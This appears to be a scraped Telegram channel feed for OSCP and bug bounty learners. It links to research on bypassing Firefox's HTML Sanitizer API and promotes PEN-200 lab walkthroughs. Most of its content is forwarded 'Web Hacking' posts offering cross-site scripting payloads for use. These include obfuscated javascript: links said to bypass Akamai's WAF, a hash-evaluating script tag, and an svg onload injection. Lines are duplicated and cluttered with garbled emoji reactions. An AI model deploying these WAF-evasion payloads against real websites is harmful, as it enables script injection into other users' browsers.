Bypassing Firefox's HTML Sanitizer API
ttps://portswigger.net/research/bypassing-firefoxs-html-sanitizer-api
ttps://portswigger.net/research/bypassing-firefoxs-html-sanitizer-api
β€1π1
We selected 11 machines in the #PEN200 #pwk labs and provided guidance on how to compromise them: offs.ec/3OJFXDi
#oscp #offensivesecurity
#oscp #offensivesecurity
π₯1
π2π1
π₯OSCP Trainingπ₯π‘βοΈπ¨π»βπ» pinned Β«https://xn--r1a.website/bug_bounty_bootcampΒ»
Forwarded from Web Hacking
Akamai WAF bypass
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
π₯3π2β€1
Forwarded from Web Hacking
A nice way to store the payload
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
π6
Forwarded from Web Hacking
A payload to bypass Akamai WAF
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
π7
Forwarded from Web Hacking
Another one
"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>
"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>
π3π€2